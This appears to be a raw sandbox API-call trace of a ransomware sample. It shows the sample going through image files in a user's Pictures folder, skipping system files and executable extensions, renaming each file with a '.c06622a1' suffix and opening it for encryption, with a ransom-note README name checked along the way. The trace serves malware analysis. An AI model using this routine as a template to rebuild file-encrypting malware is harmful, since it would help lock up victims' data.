[0155.545] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\43yp.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\43yp.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\43yp.bmp" [0155.545] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\43yp.bmp") returned 0x39 [0155.545] wcscpy (in: _Dest=0x451010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.545] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\43yp.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\43yp.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\43yp.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\43yp.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\43yp.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\43yp.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0155.547] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.547] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2910020 [0155.552] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x62ddd5f5 [0155.552] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28ccf65d [0155.552] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x24ec3dc4 [0155.552] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x22c78459 [0155.552] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x480e06f4 [0155.552] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f463d01 [0155.552] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x137f40fc [0155.552] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29fd9c9b [0155.555] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2910094, Length=0x80) returned 0x101fbe58 [0155.555] RtlComputeCrc32 (PartialCrc=0xbe58, Buffer=0x2910094, Length=0x80) returned 0xb8e237a2 [0155.555] RtlComputeCrc32 (PartialCrc=0x37a2, Buffer=0x2910094, Length=0x80) returned 0x8b549355 [0155.555] RtlComputeCrc32 (PartialCrc=0x9355, Buffer=0x2910094, Length=0x80) returned 0xdf8e0c1 [0155.555] RtlComputeCrc32 (PartialCrc=0xe0c1, Buffer=0x2910094, Length=0x80) returned 0x9ec8007d [0155.555] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0155.556] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.556] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.556] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90d3c00, ftCreationTime.dwHighDateTime=0x1d5d924, ftLastAccessTime.dwLowDateTime=0xa896f460, ftLastAccessTime.dwHighDateTime=0x1d5e2de, ftLastWriteTime.dwLowDateTime=0xa896f460, ftLastWriteTime.dwHighDateTime=0x1d5e2de, nFileSizeHigh=0x0, nFileSizeLow=0x9d03, dwReserved0=0x0, dwReserved1=0x0, cFileName="7esFsSbe8.png", cAlternateFileName="7ESFSS~1.PNG")) returned 1 [0155.556] _wcsicmp (_Str1="7esFsSbe8.png", _Str2="README.c06622a1.TXT") returned -59 [0155.556] wcsstr (_Str="7esFsSbe8.png", _SubStr="README") returned 0x0 [0155.556] _wcsicmp (_Str1="autorun.inf", _Str2="7esFsSbe8.png") returned 42 [0155.556] wcslen (_String="autorun.inf") returned 0xb [0155.556] _wcsicmp (_Str1="boot.ini", _Str2="7esFsSbe8.png") returned 43 [0155.556] wcslen (_String="boot.ini") returned 0x8 [0155.556] _wcsicmp (_Str1="bootfont.bin", _Str2="7esFsSbe8.png") returned 43 [0155.556] wcslen (_String="bootfont.bin") returned 0xc [0155.556] _wcsicmp (_Str1="bootsect.bak", _Str2="7esFsSbe8.png") returned 43 [0155.556] wcslen (_String="bootsect.bak") returned 0xc [0155.556] _wcsicmp (_Str1="desktop.ini", _Str2="7esFsSbe8.png") returned 45 [0155.556] wcslen (_String="desktop.ini") returned 0xb [0155.556] _wcsicmp (_Str1="iconcache.db", _Str2="7esFsSbe8.png") returned 50 [0155.556] wcslen (_String="iconcache.db") returned 0xc [0155.556] _wcsicmp (_Str1="ntldr", _Str2="7esFsSbe8.png") returned 55 [0155.556] wcslen (_String="ntldr") returned 0x5 [0155.556] _wcsicmp (_Str1="ntuser.dat", _Str2="7esFsSbe8.png") returned 55 [0155.556] wcslen (_String="ntuser.dat") returned 0xa [0155.556] _wcsicmp (_Str1="ntuser.dat.log", _Str2="7esFsSbe8.png") returned 55 [0155.556] wcslen (_String="ntuser.dat.log") returned 0xe [0155.556] _wcsicmp (_Str1="ntuser.ini", _Str2="7esFsSbe8.png") returned 55 [0155.556] wcslen (_String="ntuser.ini") returned 0xa [0155.556] _wcsicmp (_Str1="thumbs.db", _Str2="7esFsSbe8.png") returned 61 [0155.556] wcslen (_String="thumbs.db") returned 0x9 [0155.556] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.556] wcslen (_String="386") returned 0x3 [0155.556] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.556] wcslen (_String="adv") returned 0x3 [0155.556] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.556] wcslen (_String="ani") returned 0x3 [0155.556] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.556] wcslen (_String="bat") returned 0x3 [0155.557] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.557] wcslen (_String="bin") returned 0x3 [0155.557] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.557] wcslen (_String="cab") returned 0x3 [0155.557] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.557] wcslen (_String="cmd") returned 0x3 [0155.557] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.557] wcslen (_String="com") returned 0x3 [0155.557] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.557] wcslen (_String="cpl") returned 0x3 [0155.557] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.557] wcslen (_String="cur") returned 0x3 [0155.557] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.557] wcslen (_String="deskthemepack") returned 0xd [0155.557] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.557] wcslen (_String="diagcab") returned 0x7 [0155.557] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.557] wcslen (_String="diagcfg") returned 0x7 [0155.557] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.557] wcslen (_String="diagpkg") returned 0x7 [0155.557] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.557] wcslen (_String="dll") returned 0x3 [0155.557] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.557] wcslen (_String="drv") returned 0x3 [0155.557] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.557] wcslen (_String="exe") returned 0x3 [0155.557] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.557] wcslen (_String="hlp") returned 0x3 [0155.557] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.557] wcslen (_String="icl") returned 0x3 [0155.557] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.557] wcslen (_String="icns") returned 0x4 [0155.557] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.557] wcslen (_String="ico") returned 0x3 [0155.557] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.557] wcslen (_String="ics") returned 0x3 [0155.557] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.557] wcslen (_String="idx") returned 0x3 [0155.557] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.558] wcslen (_String="ldf") returned 0x3 [0155.558] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.558] wcslen (_String="lnk") returned 0x3 [0155.558] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.558] wcslen (_String="mod") returned 0x3 [0155.558] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.558] wcslen (_String="mpa") returned 0x3 [0155.558] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.558] wcslen (_String="msc") returned 0x3 [0155.558] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.558] wcslen (_String="msp") returned 0x3 [0155.558] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.558] wcslen (_String="msstyles") returned 0x8 [0155.558] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.558] wcslen (_String="msu") returned 0x3 [0155.558] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.558] wcslen (_String="nls") returned 0x3 [0155.558] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.558] wcslen (_String="nomedia") returned 0x7 [0155.558] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.558] wcslen (_String="ocx") returned 0x3 [0155.558] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.558] wcslen (_String="prf") returned 0x3 [0155.558] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.558] wcslen (_String="ps1") returned 0x3 [0155.558] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.558] wcslen (_String="rom") returned 0x3 [0155.558] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.558] wcslen (_String="rtp") returned 0x3 [0155.558] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.558] wcslen (_String="scr") returned 0x3 [0155.558] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.558] wcslen (_String="shs") returned 0x3 [0155.558] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.558] wcslen (_String="spl") returned 0x3 [0155.558] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.558] wcslen (_String="sys") returned 0x3 [0155.558] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.558] wcslen (_String="theme") returned 0x5 [0155.559] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.559] wcslen (_String="themepack") returned 0x9 [0155.559] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.559] wcslen (_String="wpx") returned 0x3 [0155.559] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.559] wcslen (_String="lock") returned 0x4 [0155.559] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.559] wcslen (_String="key") returned 0x3 [0155.559] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.559] wcslen (_String="hta") returned 0x3 [0155.559] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.559] wcslen (_String="msi") returned 0x3 [0155.559] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.559] wcslen (_String="pdb") returned 0x3 [0155.559] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.559] wcslen (_String="sql") returned 0x3 [0155.559] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.559] wcslen (_String="sqlite") returned 0x6 [0155.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.559] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.559] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.559] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.559] wcscpy (in: _Dest=0x45000f2, _Source="7esFsSbe8.png" | out: _Dest="7esFsSbe8.png") returned="7esFsSbe8.png" [0155.559] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\7esFsSbe8.png", dwFileAttributes=0x80) returned 1 [0155.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\7esFsSbe8.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\7esfssbe8.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x658 [0155.560] SetFilePointerEx (in: hFile=0x658, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.560] ReadFile (in: hFile=0x658, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.560] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x73d5f9f2 [0155.560] RtlComputeCrc32 (PartialCrc=0xf9f2, Buffer=0x3fe8f4, Length=0x80) returned 0xe09aa5f6 [0155.560] RtlComputeCrc32 (PartialCrc=0xa5f6, Buffer=0x3fe8f4, Length=0x80) returned 0x9d63163d [0155.560] RtlComputeCrc32 (PartialCrc=0x163d, Buffer=0x3fe8f4, Length=0x80) returned 0x5f30c36a [0155.560] RtlComputeCrc32 (PartialCrc=0xc36a, Buffer=0x3fe8f4, Length=0x80) returned 0xee74d6d9 [0155.560] CloseHandle (hObject=0x658) returned 1 [0155.561] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.561] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\7esFsSbe8.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\7esFsSbe8.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\7esFsSbe8.png" [0155.561] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\7esFsSbe8.png") returned 0x3e [0155.561] wcscpy (in: _Dest=0x4510114, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.561] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\7esFsSbe8.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\7esfssbe8.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\7esFsSbe8.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\7esfssbe8.png.c06622a1"), dwFlags=0x8) returned 1 [0155.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\7esFsSbe8.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\7esfssbe8.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x658 [0155.565] CreateIoCompletionPort (FileHandle=0x658, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.565] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0155.570] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x31972c70 [0155.570] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7c114592 [0155.570] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2fd878a2 [0155.570] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50712b3b [0155.570] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77c47c0c [0155.570] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5415fc7c [0155.570] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x52970d91 [0155.570] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x15312a92 [0155.573] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xfec39be5 [0155.573] RtlComputeCrc32 (PartialCrc=0x9be5, Buffer=0x2f30094, Length=0x80) returned 0x5db6767a [0155.573] RtlComputeCrc32 (PartialCrc=0x767a, Buffer=0x2f30094, Length=0x80) returned 0x557a8440 [0155.573] RtlComputeCrc32 (PartialCrc=0x8440, Buffer=0x2f30094, Length=0x80) returned 0x8e9b442e [0155.573] RtlComputeCrc32 (PartialCrc=0x442e, Buffer=0x2f30094, Length=0x80) returned 0x796464d7 [0155.573] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0155.573] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.573] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.573] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129f1b50, ftCreationTime.dwHighDateTime=0x1d5e6d4, ftLastAccessTime.dwLowDateTime=0x7df3b8f0, ftLastAccessTime.dwHighDateTime=0x1d5e285, ftLastWriteTime.dwLowDateTime=0x7df3b8f0, ftLastWriteTime.dwHighDateTime=0x1d5e285, nFileSizeHigh=0x0, nFileSizeLow=0x17da1, dwReserved0=0x0, dwReserved1=0x0, cFileName="8_Zfefw0OFfdn4m.bmp", cAlternateFileName="8_ZFEF~1.BMP")) returned 1 [0155.573] _wcsicmp (_Str1="8_Zfefw0OFfdn4m.bmp", _Str2="README.c06622a1.TXT") returned -58 [0155.573] wcsstr (_Str="8_Zfefw0OFfdn4m.bmp", _SubStr="README") returned 0x0 [0155.573] _wcsicmp (_Str1="autorun.inf", _Str2="8_Zfefw0OFfdn4m.bmp") returned 41 [0155.573] wcslen (_String="autorun.inf") returned 0xb [0155.573] _wcsicmp (_Str1="boot.ini", _Str2="8_Zfefw0OFfdn4m.bmp") returned 42 [0155.573] wcslen (_String="boot.ini") returned 0x8 [0155.573] _wcsicmp (_Str1="bootfont.bin", _Str2="8_Zfefw0OFfdn4m.bmp") returned 42 [0155.573] wcslen (_String="bootfont.bin") returned 0xc [0155.574] _wcsicmp (_Str1="bootsect.bak", _Str2="8_Zfefw0OFfdn4m.bmp") returned 42 [0155.574] wcslen (_String="bootsect.bak") returned 0xc [0155.574] _wcsicmp (_Str1="desktop.ini", _Str2="8_Zfefw0OFfdn4m.bmp") returned 44 [0155.574] wcslen (_String="desktop.ini") returned 0xb [0155.574] _wcsicmp (_Str1="iconcache.db", _Str2="8_Zfefw0OFfdn4m.bmp") returned 49 [0155.574] wcslen (_String="iconcache.db") returned 0xc [0155.574] _wcsicmp (_Str1="ntldr", _Str2="8_Zfefw0OFfdn4m.bmp") returned 54 [0155.574] wcslen (_String="ntldr") returned 0x5 [0155.574] _wcsicmp (_Str1="ntuser.dat", _Str2="8_Zfefw0OFfdn4m.bmp") returned 54 [0155.574] wcslen (_String="ntuser.dat") returned 0xa [0155.574] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8_Zfefw0OFfdn4m.bmp") returned 54 [0155.574] wcslen (_String="ntuser.dat.log") returned 0xe [0155.574] _wcsicmp (_Str1="ntuser.ini", _Str2="8_Zfefw0OFfdn4m.bmp") returned 54 [0155.574] wcslen (_String="ntuser.ini") returned 0xa [0155.574] _wcsicmp (_Str1="thumbs.db", _Str2="8_Zfefw0OFfdn4m.bmp") returned 60 [0155.574] wcslen (_String="thumbs.db") returned 0x9 [0155.574] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.574] wcslen (_String="386") returned 0x3 [0155.574] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.574] wcslen (_String="adv") returned 0x3 [0155.574] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.574] wcslen (_String="ani") returned 0x3 [0155.574] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.574] wcslen (_String="bat") returned 0x3 [0155.574] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.574] wcslen (_String="bin") returned 0x3 [0155.574] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.574] wcslen (_String="cab") returned 0x3 [0155.574] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.574] wcslen (_String="cmd") returned 0x3 [0155.574] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.574] wcslen (_String="com") returned 0x3 [0155.574] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.574] wcslen (_String="cpl") returned 0x3 [0155.574] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.574] wcslen (_String="cur") returned 0x3 [0155.574] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.574] wcslen (_String="deskthemepack") returned 0xd [0155.574] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.575] wcslen (_String="diagcab") returned 0x7 [0155.575] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.575] wcslen (_String="diagcfg") returned 0x7 [0155.575] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.575] wcslen (_String="diagpkg") returned 0x7 [0155.575] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.575] wcslen (_String="dll") returned 0x3 [0155.575] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.575] wcslen (_String="drv") returned 0x3 [0155.575] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.575] wcslen (_String="exe") returned 0x3 [0155.575] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.575] wcslen (_String="hlp") returned 0x3 [0155.575] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.575] wcslen (_String="icl") returned 0x3 [0155.575] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.575] wcslen (_String="icns") returned 0x4 [0155.575] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.575] wcslen (_String="ico") returned 0x3 [0155.575] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.575] wcslen (_String="ics") returned 0x3 [0155.575] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.575] wcslen (_String="idx") returned 0x3 [0155.575] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.575] wcslen (_String="ldf") returned 0x3 [0155.575] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.575] wcslen (_String="lnk") returned 0x3 [0155.575] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.575] wcslen (_String="mod") returned 0x3 [0155.575] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.575] wcslen (_String="mpa") returned 0x3 [0155.575] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.575] wcslen (_String="msc") returned 0x3 [0155.575] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.575] wcslen (_String="msp") returned 0x3 [0155.575] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.575] wcslen (_String="msstyles") returned 0x8 [0155.576] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.576] wcslen (_String="msu") returned 0x3 [0155.576] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.576] wcslen (_String="nls") returned 0x3 [0155.576] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.576] wcslen (_String="nomedia") returned 0x7 [0155.576] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.576] wcslen (_String="ocx") returned 0x3 [0155.576] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.576] wcslen (_String="prf") returned 0x3 [0155.576] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.576] wcslen (_String="ps1") returned 0x3 [0155.576] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.576] wcslen (_String="rom") returned 0x3 [0155.576] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.576] wcslen (_String="rtp") returned 0x3 [0155.576] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.576] wcslen (_String="scr") returned 0x3 [0155.576] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.576] wcslen (_String="shs") returned 0x3 [0155.576] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.576] wcslen (_String="spl") returned 0x3 [0155.576] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.576] wcslen (_String="sys") returned 0x3 [0155.576] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.576] wcslen (_String="theme") returned 0x5 [0155.576] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.576] wcslen (_String="themepack") returned 0x9 [0155.576] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.576] wcslen (_String="wpx") returned 0x3 [0155.576] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.576] wcslen (_String="lock") returned 0x4 [0155.576] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.576] wcslen (_String="key") returned 0x3 [0155.576] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.576] wcslen (_String="hta") returned 0x3 [0155.576] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.576] wcslen (_String="msi") returned 0x3 [0155.576] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.577] wcslen (_String="pdb") returned 0x3 [0155.577] _wcsicmp (_Str1="sql", _Str2="bmp") returned 17 [0155.577] wcslen (_String="sql") returned 0x3 [0155.577] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.577] wcslen (_String="sqlite") returned 0x6 [0155.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.577] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.577] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.577] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.577] wcscpy (in: _Dest=0x45000f2, _Source="8_Zfefw0OFfdn4m.bmp" | out: _Dest="8_Zfefw0OFfdn4m.bmp") returned="8_Zfefw0OFfdn4m.bmp" [0155.577] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\8_Zfefw0OFfdn4m.bmp", dwFileAttributes=0x80) returned 1 [0155.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\8_Zfefw0OFfdn4m.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\8_zfefw0offdn4m.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 